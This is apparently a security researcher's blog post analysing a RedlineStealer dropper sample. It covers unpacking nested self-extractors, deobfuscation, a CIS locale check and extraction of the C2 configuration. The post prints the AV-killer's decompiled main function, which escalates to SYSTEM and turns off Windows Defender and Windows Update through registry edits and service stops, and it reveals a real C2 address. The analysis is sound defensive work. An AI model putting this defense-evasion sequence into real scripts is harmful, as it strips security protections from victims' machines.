RedlineStealer is the top malware family on Malware Bazaar, and I’ve been curious about it for a while. So here is a quick first look with some unpacking, config extraction and identifying a locale check.
The sample was chosen in a very simple way: Picking the newest sample on Malware Bazaar which was tagged as Redline. Analysis will show that the sample does not just include Redline, but also a AV-Killer, and probably also Amadey and SmokeLoader.
The Splunk Threat Research Team looked at a similar sample in June already and has prettier graphics and deobfuscation, as well as some more details. But I’ll include some things here they didn’t write about: Countries being excluded from being targeted (spoiler: CIS) and how to extract the C2 server IP config!
Sample: d38ebded167e18fcca38e50d9161e679046b51be9c9b80eeb51250571f9d2f86
One of the first things one can notice when looking at the sample in PeStudio, or even in the file properties, is the description “Win32 Cabinet Self-Extractor”.
Looking at the entropy one can clearly see that there is compressed or encrypted content packed in the file. This Self-Extractor is a Microsoft product for self-decompressing executables intended for software installation and updates. The compressed content can be found in a CABINET resource in the file.
This also makes unpacking very easy - by using the appropriate commandline switches.
Using the /?
parameter helps to see the commandline options for unpacking:
Using this, the initial file can be unpacked easily:
redline.exe /C /T:C:\Users\_USER_\Desktop\unpack
This provides two new files:
v4165882.exe is another Win32 Cabinet Self-Extractor, which can be unpacked in the same way:
v4165882.exe /C /T:C:\Users\_USER_\Desktop\unpack
And yet again, v2231630.exe is another file that needs to be unpacked:
v2231630.exe /C /T:C:\Users\_USER_\Desktop\unpack
This provides us with two more files:
In total this initial file extracted four interesting exectuables (ignoring the self-extractors):
A quick first look at the hashes on VirusTotal shows all of them as malicious: AVKiller, Redline Stealer, SmokeLoader and Amadey
A small visualisation of the unpacking process:
SHA256: 7fb74cdd97c37be1a1aa474755b1ef7026b6da7d54d5010a31f87610a137355b
This is a .NET executable for defense evasion. Looking at the file in dnSpy shows a completely unobfuscated file telling us a story in the main function alone: Privilege escalation, disabling services, and changing registry keys (focusing on Windows defender and updates):
// Healer.Program
// Token: 0x06000010 RID: 16 RVA: 0x0000228C File Offset: 0x0000048C
private static void Main()
{
try
{
Program.GetUsername();
Program.StartTrustedinstallerService();
Program.EscalateToSystem();
Program.EscalateToTrustedinstaller();
Program.DisableService("WinDefend");
Program.RegistryEdit("SOFTWARE\\Microsoft\\Windows Defender\\Features", "TamperProtection", "0");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender", "DisableAntiSpyware", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableBehaviorMonitoring", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableIOAVProtection", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableOnAccessProtection", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableRealtimeMonitoring", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableScanOnRealtimeEnable", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\Notifications", "DisableNotifications", "1");
Program.DisableService("wuauserv");
Program.DisableService("WaaSMedicSvc");
Program.DisableService("UsoSvc");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "AUOptions", "2");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "AutoInstallMinorUpdates", "0");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "NoAutoUpdate", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "NoAutoRebootWithLoggedOnUsers", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "UseWUServer", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "DoNotConnectToWindowsUpdateInternetLocations", "1");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "WUStatusServer", "server.wsus");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "WUServer", "server.wsus");
Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "UpdateServiceUrlAlternate", "server.wsus");
}
catch
{
}
}
SHA256: 4de7dcea514e6b52a1f43e89e462fea2488eb448ed143f084b5711eef0d3ac28
Based on some quick research this file seems to be Amadey bot and was not further analysed here.
SHA256: 7ec02c57f746e6abb650023709b7758e48dcf9ebbfb0a20d987fbb4b5f1f47ee
Based on some quick research this file seems to be SmokeLoader and was not further analysed here.
SHA256: cfda7cc0495842dd8a5fc56c68de17888e38551436196f1cbc4586cfc5dcefd0
Based on some quick research this file seemed to be Redline Stealer and will be analyzed in more detail in the following section.
First, it can be noted that this is a .NET executable with probably at least one layer of obfuscation applied:
Using de4dot and forcing the Confuser deobfuscation allows for some deobfuscation (but definitely not completely):
de4dot.exe d4937146.exe -p cr
de4dot v3.1.41592.3405 Copyright (C) 2011-2015 de4dot@gmail.com
Latest version and source code: https://github.com/0xd4d/de4dot
Detected Confuser (C:\Users\_USER_\Desktop\unpack\d4937146.exe)
Cleaning C:\Users\_USER_\Desktop\unpack\d4937146.exe
Renaming all obfuscated symbols
Saving C:\Users\_USER_\Desktop\unpack\d4937146-cleaned.exe
When running the binary one of the initial steps - before decrypting the C2 server config - appears to be a region check.
Deobfuscated strings show the countries belonging to (or formerly associated with) the Commonwealth of Independent States (CIS) where the malware is not being executed:
Shortly after that the malware decrypts the included configuration for the C2 server using XOR decryption. In this case the password for decryption is “Formative”:
Config:
The field “IP”, containing the C2 IP and port, is xored using this password and the result gets base64 decoded:
The whole process can be repeated and verified in Cyberchef:
These strings are contained in the #US stream can be read from there using the Unit42 dotnetfile parser. With this we can build a simple config extractor (Github):
> python3 ./config_extractor.py -f d4937146.exe
{
"key": "Formative",
"id": "J1w4BQJHOEs=",
"ip": "CBURGC4gLAMrLAgHIwsTXzsxLRg8FyRJ",
"decrypted_ip": "77.91.68.68:19071"
}
A next step for this analysis would be checking and building Yara rules for detection and analysing the stealer functionality (what and how).